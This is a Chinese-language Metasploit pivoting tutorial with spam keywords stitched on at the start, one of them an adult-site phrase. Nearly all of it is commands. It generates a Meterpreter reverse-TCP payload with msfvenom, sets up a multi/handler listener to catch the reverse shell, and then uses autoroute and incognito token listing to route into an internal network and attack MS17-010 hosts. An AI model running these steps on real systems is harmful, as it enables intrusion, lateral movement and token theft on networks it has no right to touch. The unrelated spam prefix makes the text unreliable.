站长之家psd,镇江建设银行网站,一级a做爰片免费网站中文,定制网站要多少钱利用背景在渗透的过程中常常会遇到这种场景#xff1a;我们已经通过web渗透拿下一台内网服务器#xff0c;为了进一步进行内网渗透#xff0c;我们会利用“沦陷主机”作为跳板进行进一步的内网渗透#xff0c;扩大战果。现在假设的场景是此时我们已经拿下一台内网服务器的远…利用背景在渗透的过程中常常会遇到这种场景我们已经通过web渗透拿下一台内网服务器为了进一步进行内网渗透我们会利用“沦陷主机”作为跳板进行进一步的内网渗透扩大战果。现在假设的场景是此时我们已经拿下一台内网服务器的远程桌面环境在进行内网渗透时发现内网有大量存MS17-010的漏洞主机如果我们想拿下这些主机可能就要使用NSA工具箱但是此工具箱的使用相当的麻烦这里提供一个思路我们可以利用“沦陷主机”作为跳板来实现使用MSF框架直接对内网主机的直接渗透。MSF框架为我们提供了一个很好功能跳板功能模块此模块可以为我们添加一条转发路由去往内网。利用过程攻击机ip192.168.1.106 监听端口1234靶机ip192.168.1.1081. 在攻击端生成一个木马文件rootkali:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST192.168.1.106LPORT1234 -f exe -o payload.exe2.msf下使用反弹连接rootkali:~# msfconsolemsf use exploit/multi/handler3.设置反弹需要的payloadmsf exploit(multi/handler) set payload windows/meterpreter/reverse_tcp4.查看配置选项msf exploit(multi/handler) show options5.设置反弹回来自己的主机IP和端口msf exploit(multi/handler) set LHOST 192.168.1.106msf exploit(multi/handler) set LPORT 12346.目标主机打开木马程序文件payload.exe得到反弹shellmsf exploit(multi/handler) runMSF跳板功能MSF的跳板功能是MSF框架中自带的一个路由转发功能其实现过程就是MSF框架在已经获取的meterpreter shell的基础上添加一条去往“内网”的路由直接使用msf去访问原本不能直接访问的内网资源只要路由可达了那么我们使用msf的强大功能为所欲为了。获取目标内网相关信息run get_local_subnets –获取被攻击目标内网地址网段run autoroute -s 192.168.1.0/24–扫描有效网卡的整个C段的信息run autoroute -p –查看域环境use incognito –调用劫持域管理模块list_tokens -u –查看当前目标主机的域环境信息添加去往目标网段的转发路由run autoroute –s 目标内网地址网段查看路由添加情况run autoroute -p将去往内网的路由打通后接下来就可以使用MSF平台直接对内网主机扫描和进行各种高危漏洞的直接渗透利用了。